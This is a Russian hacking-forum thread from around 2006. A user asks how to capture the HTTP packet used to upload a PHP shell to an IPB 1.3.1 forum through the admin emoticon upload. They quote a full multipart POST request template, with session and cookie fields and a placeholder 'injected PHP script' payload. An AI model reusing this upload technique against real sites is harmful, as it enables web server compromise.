Форум АНТИЧАТ - Naviscope перехват пакета

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Naviscope перехват пакета (https://forum.antichat.xyz/showthread.php?t=20490)

Naviscope перехват пакета

Здесь есть хорошая статья как залить шелл на форум
http://antichat.ru/txt/IPB/index2.php
Там также дается пример перехваченного пакета

Код:

POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo

Accept-Language: ru

Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc

Proxy-Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Content-Length: 677

Pragma: no-cache

Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798; 



-----------------------------7d43942c405bc

Content-Disposition: form-data; name="adsess"



7456d367b18da87d161f59424a4e96f7

-----------------------------7d43942c405bc

Content-Disposition: form-data; name="code"



emo_upload

-----------------------------7d43942c405bc

Content-Disposition: form-data; name="act"



op

-----------------------------7d43942c405bc

Content-Disposition: form-data; name="MAX_FILE_SIZE"



10000000000

-----------------------------7d43942c405bc

Content-Disposition: form-data; name="FILE_UPLOAD"; filename="c:/myFile.php"

Content-Type: application/octet-stream



<% echo("Hello from injected PHP script") %>

-----------------------------7d43942c405bc--

но у меня переватывается только

Код:

GET http://www.site.ru/forum/admin.php?adsess=adb5bdf51ef7561657e41a0587585012&act=op&code=emo HTTP/1.0

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://www.site.ru/forum/admin.php?adsess=adb5bef51ef7563657e41a0587585012

Accept-Language: en-us

Proxy-Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)

Host: www.site.ru

Cookie: cnstid=12519652; member_name=user; member_password=as694a33b5945691629dee124b813e33; member_newpm=0; member_id=1; pass_hash=as694a33b5945691629dee124b813e33; member_newpm=0; PHPSESSID=adabe49374adf90a5687a8203c24e50b

можно ли какнибудь также перехватить или где можна найти вот эту часть

Код:

-----------------------------7d43942c405bc

Content-Disposition: form-data; name="adsess"



7456d367b18da87d161f59424a4e96f7

-----------------------------7d43942c405bc

Content-Disposition: form-data; name="code"



emo_upload

-----------------------------7d43942c405bc

Content-Disposition: form-data; name="act"



op

-----------------------------7d43942c405bc

Content-Disposition: form-data; name="MAX_FILE_SIZE"



10000000000

-----------------------------7d43942c405bc

Content-Disposition: form-data; name="FILE_UPLOAD"; filename="c:/myFile.php"

Content-Type: application/octet-stream



<% echo("Hello from injected PHP script") %>

-----------------------------7d43942c405bc--

IPB v1.3.1
Зарание спасибо

Если надо только перехватить пакет - поставь Ethereal или Proxomitron. Хотя скорее всего Навископ перехватывает то, что есть. Просто форум другого "типа".

Это всё что твой браузер послал, еслиб он посылал что-то кроме заголовка, он бы также послал его длину, как в первом варианте.

Цитата:

Content-Length: 677

Так что перехватываешь ты, не то.

Код:

Перехватываю не то

Я открываю страницу Manege Emotions c browse кнопкой в низу и смотрю что naviscope показал.

Вполне нормальный ответ на запрос Get. В твоем же примере стоял Post. ИМХО - ты зашел не на такой форум, как в твоем примере.

Помоему стоит лучше перехватить запрос на загрузку файла =)

ИМХО, ты просто зашел не на такой форум, как в твоем примере. В примере запрос Post, а в твоем случае - Get. А Get`ом много не передашь.
Навископ просто делает свое дело, довит то, что есть.

Цитата:

Сообщение от Ээх

Не на одном форуме файлы GETом не передают, так-что ты передаёшь не ту инфу.

[offtop]Представляю, как-бы, хотя-бы 100кб-ная картинка через GET передавалась бы, хотя если её забэйсить и передовать уже 150кб текста :D [/offtop]

я пробовал валовить пакет в процессе upload, но ниче не вылавливеатся кроме

Код:

HTTP/1.0 200 OK

Date: Wed, 14 Jun 2006 18:16:40 GMT

Server: Apache

X-Powered-By: PHP/5.1.4

Connection: close

Content-Type: text/html

А это ты выловил то, что вернул тебе сервер.
Попробуй [это] для отлавливания пакетов пароль antichat.